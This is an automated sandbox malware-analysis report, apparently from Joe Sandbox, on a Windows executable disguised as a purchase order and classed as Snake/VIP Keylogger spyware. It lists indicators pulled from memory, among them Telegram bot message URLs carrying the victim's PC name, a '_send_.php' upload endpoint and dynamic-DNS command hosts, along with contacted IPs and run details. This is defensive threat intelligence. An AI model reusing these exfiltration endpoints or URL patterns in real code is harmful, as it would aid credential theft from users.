http://checkip.dyndns.org	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en4	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/Prod.C:	edb.log.5.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/v20	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/4	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B16000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtabv20	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002A39000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1136385790.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1529670563.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000000.00000002.1137545675.0000000004C3B000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636899
Start date and time:	2025-03-13 08:48:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe renamed because original name is a hash value
Original Sample Name:	SC110-11Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/16@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 93 Number of non-executed functions: 24
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 13.89.230.12, 52.149.20.212, 20.190.159.68
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobvmssprdcus03.centralus.cloudapp.azure.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:49:15	API Interceptor	273x Sleep call for process: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe modified
03:49:17	API Interceptor	13x Sleep call for process: powershell.exe modified
03:49:25	API Interceptor	2x Sleep call for process: svchost.exe modified
03:49:57	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse
	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==	Get hash	malicious	HTMLPhisher	Browse
	https://possibles-x.com/	Get hash	malicious	HTMLPhisher	Browse
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Windows Analysis Report
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe